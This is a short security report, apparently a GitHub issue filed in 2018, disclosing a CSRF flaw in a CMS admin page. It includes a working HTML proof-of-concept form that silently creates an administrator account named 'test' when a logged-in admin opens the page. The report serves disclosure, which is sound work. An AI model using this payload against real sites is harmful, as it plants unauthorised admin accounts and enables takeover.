Description
Hello. I'd like to report a security issue on the admin page.
Summary
This vulnerability is a CSRF vulnerability that allows creating any kind of account.
When an attacker induces an authorized victim to visit a malicious web page and makes them send requests, the victim creates an account without intending to.
Reproduce
These are the steps to reproduce.
- After you log in to the admin page (/en_US/admin/), access the HTML page that contains the payload.
Then you will find that an admin account named [test] has been created.
Payloads
<html>
<body>
<script>history.pushState('', '', '/')</script>
<form action="http://your.cms.domain.example.com/en_US/admin/user/manage/add" method="POST">
<input type="hidden" name="_method" value="POST" />
<input type="hidden" name="name" value="test" />
<input type="hidden" name="username" value="test" />
<input type="hidden" name="email" value="test@example.com" />
<input type="hidden" name="web" value="" />
<input type="hidden" name="locale" value="" />
<input type="hidden" name="status" value="0" />
<input type="hidden" name="status" value="1" />
<input type="hidden" name="password" value="testtest" />
<input type="hidden" name="password2" value="testtest" />
<input type="hidden" name="roles[_ids]" value="" />
<input type="hidden" name="roles[_ids][]" value="1" />
<input type="hidden" name="welcome_message" value="0" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
I think this security issue is not serious, because an attack using this vulnerability requires inducing the victim.
Event
- 2018-03-15: this vulnerability was discovered.
- 2018-03-27: opened an issue on GitHub.